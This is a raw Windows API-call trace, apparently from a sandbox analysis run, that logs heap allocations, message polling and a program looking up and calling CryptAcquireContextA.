[0158.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0158.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0158.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0158.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0158.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0158.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0158.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0158.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0158.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0158.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0158.897] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0158.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0158.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0158.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0158.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0158.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0158.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0158.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0158.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0158.996] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0158.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0158.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0158.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0158.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0158.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0158.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0158.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0158.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0158.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0158.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0158.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0158.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0158.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0158.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0158.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0158.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0158.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0158.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0158.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0158.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0159.000] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0159.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0159.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0159.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0159.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0159.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0159.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0159.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0159.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69bc8 [0159.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0159.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0159.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0159.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0159.001] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0159.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0159.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0159.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0159.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0159.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0159.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0159.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0159.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0159.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0159.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0159.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0159.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0159.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0159.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0159.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0159.002] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0159.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0159.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0159.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0159.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.006] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0159.006] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0159.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0159.007] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0159.007] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0159.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 